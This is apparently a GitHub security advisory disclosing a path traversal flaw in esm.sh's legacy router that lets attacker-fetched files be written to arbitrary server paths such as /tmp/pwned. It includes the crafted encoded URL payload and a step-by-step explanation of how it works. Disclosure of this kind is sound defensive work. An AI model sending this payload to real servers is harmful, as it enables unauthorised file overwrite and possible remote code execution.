OSV 1.4.0 · github-reviewed · 修改于 2026-06-09 09:59
发布时间
2026-05-13 06:22
GitHub 审查时间
2026-05-13 06:22
NVD 发布时间
2026-05-29 00:16
源文件
advisories/github-reviewed/2026/05/GHSA-3636-h3vx-6465/GHSA-3636-h3vx-6465.json
The legacy router first retrieves a response from legacyServer, parses the incoming request path, and ultimately writes the data to storage via buildStorage.Put
(see https://github.com/esm-dev/esm.sh/blob/4312ae93e518121e764a18bb521af12e490ef137/server/legacy_router.go#L291).
For a URL such as:
http://ESM_SH_HOST/v111/[email protected]/esnext/..%2f..%2f..%2fgh/<attacker>/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned
the router concatenates the path components without sanitizing them, producing a storage key like:
legacy/v111/[email protected]/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned
When this key is used, the underlying file system resolves the relative segments and writes the file to /tmp/pwned. Thus an attacker can craft a request that writes data to arbitrary locations on the server.
URL Construction
A crafted request is sent to the server:
http://ESM_SH_HOST/v111/[email protected]/esnext/..%2f..%2f..%2fgh/<attacker>/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned
Proxy to Legacy Server
The request is forwarded to:
http://legacy.esm.sh/v111/[email protected]/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../tmp/pwned
which resolves to:
http://legacy.esm.sh/gh/<attacker>/exp@1171e85d5d/foo.md
File Retrieval
The server fetches foo.md from the GitHub repository .
https://github.com/<attacker>/expPath Normalisation & Storage
The storage path derived from the request is:
legacy/v111/[email protected]/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned
Normalising this path yields /tmp/pwned. The retrieved file content is then written to that location.
Result
By repeating this pattern, an attacker can overwrite arbitrary binaries or scripts on the server, paving the way for remote code execution.
splitline (@_splitline_) from DEVCORE Research Team